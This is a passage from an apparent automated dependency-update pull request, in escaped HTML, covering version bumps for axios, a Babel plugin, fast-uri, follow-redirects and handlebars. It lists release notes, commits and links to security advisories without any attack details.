href=\"https://github.com/axios/axios/compare/v0.30.2...v0.32.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for axios since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/plugin-transform-modules-systemjs` from 7.16.5 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/plugin-transform-modules-systemjs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a458f66074b97d54773db8159af673d23b26079b\"\u003e\u003ccode\u003ea458f66\u003c/code\u003e\u003c/a\u003e v7.29.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/32ebd5aaf2526ddd176fd6a3d1e3dc594abdc8d9\"\u003e\u003ccode\u003e32ebd5a\u003c/code\u003e\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17974\"\u003e#17974\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/0053db620c05acf0036f593b5aaf4e372daa79d0\"\u003e\u003ccode\u003e0053db6\u003c/code\u003e\u003c/a\u003e Update polyfill packages (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17727\"\u003e#17727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/61647ae2397c82c3c71f077b5ab109106a5cac0f\"\u003e\u003ccode\u003e61647ae\u003c/code\u003e\u003c/a\u003e v7.28.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a177d551adba99773f4ff00ea9bf46550def6132\"\u003e\u003ccode\u003ea177d55\u003c/code\u003e\u003c/a\u003e [Babel 8] Use \u003ccode\u003et.traverseFast\u003c/code\u003e to replace some \u003ccode\u003epath.traverse\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17518\"\u003e#17518\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/eebd3a06021c13d335b5b0bd79734df3abbea678\"\u003e\u003ccode\u003eeebd3a0\u003c/code\u003e\u003c/a\u003e v7.27.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/317e332e650bc04907bc787ab79f930288a3e71e\"\u003e\u003ccode\u003e317e332\u003c/code\u003e\u003c/a\u003e Enforce node protocol import (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17207\"\u003e#17207\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/fdc0fb59e119ee0b38bced63867a344a5b4bc2f3\"\u003e\u003ccode\u003efdc0fb5\u003c/code\u003e\u003c/a\u003e [Babel 8] Bump nodejs requirements to \u003ccode\u003e^20.19.0 || \u0026gt;= 22.12.0\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17204\"\u003e#17204\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-plugin-transform-modules-systemjs\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​babel/plugin-transform-modules-systemjs\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fast-uri` from 3.1.0 to 3.1.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastify/fast-uri/releases\"\u003efast-uri's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.1.2\u003c/h2\u003e\n\u003ch2\u003e⚠️ Security Release\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc\"\u003ehttps://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHandle malformed fragment decoding as a parse error by \u003ca href=\"https://github.com/mcollina\"\u003e\u003ccode\u003e@​mcollina\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/171\"\u003efastify/fast-uri#171\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.1...v3.1.2\"\u003ehttps://github.com/fastify/fast-uri/compare/v3.1.1...v3.1.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev3.1.1\u003c/h2\u003e\n\u003ch2\u003e⚠️ Security Release\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6\"\u003ehttps://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild(deps-dev): bump tsd from 0.32.0 to 0.33.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/148\"\u003efastify/fast-uri#148\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/149\"\u003efastify/fast-uri#149\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(.npmrc): ignore scripts by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/150\"\u003efastify/fast-uri#150\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): remove \u003ccode\u003e@​fastify/pre-commit\u003c/code\u003e by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/151\"\u003efastify/fast-uri#151\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/152\"\u003efastify/fast-uri#152\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(ci): add concurrency config by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/153\"\u003efastify/fast-uri#153\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/154\"\u003efastify/fast-uri#154\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/156\"\u003efastify/fast-uri#156\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(license): standardise license notice by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/159\"\u003efastify/fast-uri#159\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003estyle: remove trailing whitespace by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/161\"\u003efastify/fast-uri#161\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: remove unused github files by \u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/162\"\u003efastify/fast-uri#162\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update readme by \u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/164\"\u003efastify/fast-uri#164\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump fastify/workflows/.github/workflows/plugins-ci-package-manager.yml from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/165\"\u003efastify/fast-uri#165\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump fastify/workflows/.github/workflows/plugins-ci.yml from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/166\"\u003efastify/fast-uri#166\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump neostandard from 0.12.2 to 0.13.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/167\"\u003efastify/fast-uri#167\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add lock-threads workflow by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/169\"\u003efastify/fast-uri#169\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/162\"\u003efastify/fast-uri#162\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.0...v3.1.1\"\u003ehttps://github.com/fastify/fast-uri/compare/v3.1.0...v3.1.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/919dd8ea7689fcc220d0d9b71307f5095e723ef9\"\u003e\u003ccode\u003e919dd8e\u003c/code\u003e\u003c/a\u003e Bumped v3.1.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/c65ba573714af6b8e19e481d9444c27bc4355d07\"\u003e\u003ccode\u003ec65ba57\u003c/code\u003e\u003c/a\u003e fixup: linting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/6c86c17c3d76fb93aa3700ec6c0fa00faeb97293\"\u003e\u003ccode\u003e6c86c17\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/a95158ad308df4d92bbde4eba699ce5165e9f796\"\u003e\u003ccode\u003ea95158a\u003c/code\u003e\u003c/a\u003e Handle malformed fragment decoding without throwing (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/171\"\u003e#171\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/cea547c91c6aae610041b17b75792ca4aa035a6d\"\u003e\u003ccode\u003ecea547c\u003c/code\u003e\u003c/a\u003e Bumped v3.1.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/876ce79b662c3e5015e4e7dffe6f37752ad34f35\"\u003e\u003ccode\u003e876ce79\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/dcdf690b71a7bb3a19887ada65a9ab160d83bcc0\"\u003e\u003ccode\u003edcdf690\u003c/code\u003e\u003c/a\u003e ci: add lock-threads workflow (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/169\"\u003e#169\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/c860e6589b1ac346f66e114b4eadb9613768108c\"\u003e\u003ccode\u003ec860e65\u003c/code\u003e\u003c/a\u003e build(deps-dev): bump neostandard from 0.12.2 to 0.13.0 (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/167\"\u003e#167\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/9b4c6dc82fde0ca44e674403ece9185d85bb6d5f\"\u003e\u003ccode\u003e9b4c6dc\u003c/code\u003e\u003c/a\u003e build(deps): bump fastify/workflows/.github/workflows/plugins-ci.yml (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/166\"\u003e#166\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/85d09a9f7aa76b32c2bb005a90a71e144c361d24\"\u003e\u003ccode\u003e85d09a9\u003c/code\u003e\u003c/a\u003e build(deps): bump fastify/workflows/.github/workflows/plugins-ci-package-mana...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.0...v3.1.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.11 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.11...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `handlebars` from 4.7.7 to 4.7.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/handlebars-lang/handlebars.js/releases\"\u003ehandlebars's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.7.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: enable shell mode for spawn to resolve Windows EINVAL issue - e0137c2\u003c/li\u003e\n\u003cli\u003efix type \u0026quot;RuntimeOptions\u0026quot; also accepting string partials - eab1d14\u003c/li\u003e\n\u003cli\u003efeat(types): set \u003ccode\u003ehash\u003c/code\u003e to be a \u003ccode\u003eRecord\u0026lt;string, any\u0026gt;\u003c/code\u003e - de4414d\u003c/li\u003e\n\u003cli\u003efix non-contiguous program indices - 4512766\u003c/li\u003e\n\u003cli\u003erefactor: rename i to startPartIndex - e497a35\u003c/li\u003e\n\u003cli\u003esecurity: fix security issues - 68d8df5\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2w6w-674q-4c4q\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2w6w-674q-4c4q\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-3mfm-83xf-c92r\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-3mfm-83xf-c92r\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xhpv-hc6g-r9c6\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xhpv-hc6g-r9c6\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xjpj-3mr7-gcpf\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xjpj-3mr7-gcpf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-9cx6-37pm-9jff\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-9cx6-37pm-9jff\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2qvq-rjwj-gvw9\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2qvq-rjwj-gvw9\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-7rx3-28cr-v5wh\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-7rx3-28cr-v5wh\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-442j-39wm-28r2\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-442j-39wm-28r2\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.8...v4.7.9\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.7.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMake library compatible with workers (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1894\"\u003e#1894\u003c/a\u003e) - 3d3796c\u003c/li\u003e\n\u003cli\u003eDon't rely on Node.js global object (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1776\"\u003e#1776\u003c/a\u003e) - 2954e7e\u003c/li\u003e\n\u003cli\u003eFix compiling of each block params in strict mode (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1855\"\u003e#1855\u003c/a\u003e) - 30dbf04\u003c/li\u003e\n\u003cli\u003eFix rollup warning when importing Handlebars as ESM - 03d387b\u003c/li\u003e\n\u003cli\u003eFix bundler issue with webpack 5 (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1862\"\u003e#1862\u003c/a\u003e) - c6c6bbb\u003c/li\u003e\n\u003cli\u003eUse https instead of git for mustache submodule - 88ac068\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca 